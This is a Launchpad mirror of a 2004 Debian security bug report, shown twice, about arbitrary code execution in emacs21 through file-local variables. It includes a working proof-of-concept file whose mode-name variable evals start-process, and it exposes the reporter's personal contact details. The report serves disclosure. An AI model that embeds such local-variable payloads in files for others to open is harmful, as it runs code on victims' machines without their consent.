Ubuntu
emacs21 package

Bug #11265
Comment #2

Comment 2 for bug 11265

Revision history for this message

Debian Bug Importer (debzilla) wrote on 2004-12-18:

Message-ID: <email address hidden>
Date: Sat, 18 Dec 2004 06:54:29 +0000
From: Jan Minar <email address hidden>
To: Debian Bug Tracking System <email address hidden>
Subject: emacs21: Arbitrary code execution when opening malicious file (local variables)

--eJnRUKwClWJh1Khz
Content-Type: multipart/mixed; boundary="opJtzjQTFsWo+cga"
Content-Disposition: inline

--opJtzjQTFsWo+cga
Content-Type: text/plain; charset=iso-8859-2
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

Package: emacs21
Version: 21.2-1
Severity: grave
Justification: user security hole

Hi.

In December 2002[sic!], Georgi Guninski <email address hidden> writes in
<email address hidden>:

> Attached file demonstrates GNU Emacs 21.2.1 starting process if a text fi=
le is=20
> opened. Just open it with emacs and check for processes "yes".
>=20
> I suggest disabling local variables by default, because probably there ar=
e=20
> similar bugs of the same nature.

You can view the thread for example at Google Groups:

http://groups-beta.google.com/group/gnu.emacs.bug/browse_frm/thread/9424ec1=
b2fdae321?hl=3Den&lr=3D&ie=3DUTF-8&oe=3DUTF-8&rnum=3D1&prev=3D/groups%3Fq%3=
Dguninski%2Bemacs%26hl%3Den%26lr%3D%26ie%3DUTF-8%26oe%3DUTF-8%26selm%3Dmail=
man.763.1041357806.19936.bug-gnu-emacs%2540gnu.org%26rnum%3D1

The same url in Quoted Printable, in case it got mangled somehow en
route (run it thru recode /qp..):

http://groups-beta.google.com/group/gnu.emacs.bug/browse_frm/thread/9424ec1=
=3D
b2fdae321?hl=3D3Den&lr=3D3D&ie=3D3DUTF-8&oe=3D3DUTF-8&rnum=3D3D1&prev=3D3D/=
groups%3Fq%3=3D
Dguninski%2Bemacs%26hl%3Den%26lr%3D%26ie%3DUTF-8%26oe%3DUTF-8%26selm%3Dmail=
=3D
man.763.1041357806.19936.bug-gnu-emacs%2540gnu.org%26rnum%3D1

Georgi's file is enclosed verbatim.

I just tried it with emacs in Woody and indeed, the yes processes
started to spawn on a fast pace. I went even a bit further and found
out that the execution is not sandboxed in any way, as I was able to
execute a script that writes out a script in my home directory, chmod +x
it, and runs it in turn.

In the above thread, it's mentioned another security bug was found
earlier that week, so please take a look at it.

Cheers,
-- System Information
Debian Release: 3.0
Architecture: i386
Kernel: Linux kontryhel 2.4.28-jan #2 Sat Nov 27 02:52:26 GMT 2004 i686
Locale: LANG=3DC, LC_CTYPE=3Dcs_CZ.ISO-8859-2

Versions of packages emacs21 depends on:
ii dpkg 1.9.21 Package maintenance system for=
Deb
ii emacsen-common 1.4.15 Common facilities for all emac=
sen.
ii libc6 2.2.5-11.5 GNU C Library: Shared librarie=
s an
ii libjpeg62 6b-5 The Independent JPEG Group's J=
PEG=20
ii liblockfile1 1.03 NFS-safe locking library, incl=
udes
ii libncurses5 5.2.20020112a-7 Shared libraries for terminal =
hand
ii libpng2 1.0.12-3.woody.9 PNG library - runtime
ii libtiff3g 3.5.5-6woody1 Tag Image File Format library
ii xaw3dg 1.5-13 Xaw3d widget set
ii xlibs 4.1.0-16woody5 X Window System client librari=
es
ii zlib1g 1:1.1.4-1.0woody0 compression library - runtime

--=20
)^o-o^| jabber: <email address hidden>
| .v K e-mail: jjminar FastMail FM
` - .' phone: +44(0)7981 738 696
\ __/Jan icq: 345 355 493
__|o|__Min=E1=F8 irc: <email address hidden>

--opJtzjQTFsWo+cga
Content-Type: text/plain; charset=us-ascii
Content-Disposition: attachment; filename="emacs1.emacs"
Content-Transfer-Encoding: quoted-printable

/* -*- Mode: text; tab-width:20; Eval: Mode -*- -*- forms -*- */

Emacs better than windoze.
=20
;;; Local Variables: ***
;;; mode: text ***
;;; mode-name: #("Microsoft sux" 0 4 (display (when (eval (start-process "=
/usr/bin/yes" "/usr/bin/yes" "/usr/bin/yes" "msux") ) . xxx) ) ) ***
;;; comment-start: ";;; " ***
;;; comment-end:"***" ***
;;; End: ***

--opJtzjQTFsWo+cga--

--eJnRUKwClWJh1Khz
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQFBw9Ql+uczK20Fa5cRAsbWAKCmepYq6FU3t9NHAxGtPu6kXstOqACguN5G
f/TjmbX5NaR5HlUKb8/gkjc=
=ddER
-----END PGP SIGNATURE-----

--eJnRUKwClWJh1Khz--

Message-ID: <20041218065429.GA16447@kontryhel.haltyr.dyndns.org>
Date: Sat, 18 Dec 2004 06:54:29 +0000
From: Jan Minar <jjminar@FastMail.FM>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: emacs21: Arbitrary code execution when opening malicious file (local variables)

--eJnRUKwClWJh1Khz
Content-Type: multipart/mixed; boundary="opJtzjQTFsWo+cga"
Content-Disposition: inline

--opJtzjQTFsWo+cga
Content-Type: text/plain; charset=iso-8859-2
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

Package: emacs21
Version: 21.2-1
Severity: grave
Justification: user security hole

Hi.

In December 2002[sic!], Georgi Guninski <gunin...@guninski.com> writes in
<mailman.749.1041337086.19936.bug-gnu-emacs@gnu.org>:

You can view the thread for example at Google Groups:

The same url in Quoted Printable, in case it got mangled somehow en
route (run it thru recode /qp..):

Georgi's file is enclosed verbatim.

I just tried it with emacs in Woody and indeed, the yes processes
started to spawn on a fast pace.  I went even a bit further and found
out that the execution is not sandboxed in any way, as I was able to
execute a script that writes out a script in my home directory, chmod +x
it, and runs it in turn.

In the above thread, it's mentioned another security bug was found
earlier that week, so please take a look at it.

Cheers,
-- System Information
Debian Release: 3.0
Architecture: i386
Kernel: Linux kontryhel 2.4.28-jan #2 Sat Nov 27 02:52:26 GMT 2004 i686
Locale: LANG=3DC, LC_CTYPE=3Dcs_CZ.ISO-8859-2

Versions of packages emacs21 depends on:
ii  dpkg                   1.9.21            Package maintenance system for=
 Deb
ii  emacsen-common         1.4.15            Common facilities for all emac=
sen.
ii  libc6                  2.2.5-11.5        GNU C Library: Shared librarie=
s an
ii  libjpeg62              6b-5              The Independent JPEG Group's J=
PEG=20
ii  liblockfile1           1.03              NFS-safe locking library, incl=
udes
ii  libncurses5            5.2.20020112a-7   Shared libraries for terminal =
hand
ii  libpng2                1.0.12-3.woody.9  PNG library - runtime
ii  libtiff3g              3.5.5-6woody1     Tag Image File Format library
ii  xaw3dg                 1.5-13            Xaw3d widget set
ii  xlibs                  4.1.0-16woody5    X Window System client librari=
es
ii  zlib1g                 1:1.1.4-1.0woody0 compression library - runtime

--=20
 )^o-o^|    jabber: rdancer@NJS.NetLab.Cz
 | .v  K    e-mail: jjminar FastMail FM
 `  - .'     phone: +44(0)7981 738 696
  \ __/Jan     icq: 345 355 493
 __|o|__Min=E1=F8  irc: rdancer@IRC.FreeNode.Net

--opJtzjQTFsWo+cga
Content-Type: text/plain; charset=us-ascii
Content-Disposition: attachment; filename="emacs1.emacs"
Content-Transfer-Encoding: quoted-printable

/* -*- Mode: text; tab-width:20; Eval: Mode  -*- -*- forms -*- */

Emacs better than windoze.
=20
;;; Local Variables: ***
;;; mode: text ***
;;; mode-name: #("Microsoft sux" 0 4 (display  (when (eval (start-process "=
/usr/bin/yes" "/usr/bin/yes" "/usr/bin/yes" "msux") ) . xxx) ) )  ***
;;; comment-start: ";;; "  ***
;;; comment-end:"***" ***
;;; End: ***

--opJtzjQTFsWo+cga--

--eJnRUKwClWJh1Khz
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQFBw9Ql+uczK20Fa5cRAsbWAKCmepYq6FU3t9NHAxGtPu6kXstOqACguN5G
f/TjmbX5NaR5HlUKb8/gkjc=
=ddER
-----END PGP SIGNATURE-----

--eJnRUKwClWJh1Khz--

Ubuntuemacs21 package

Comment 2 for bug 11265

Ubuntu
emacs21 package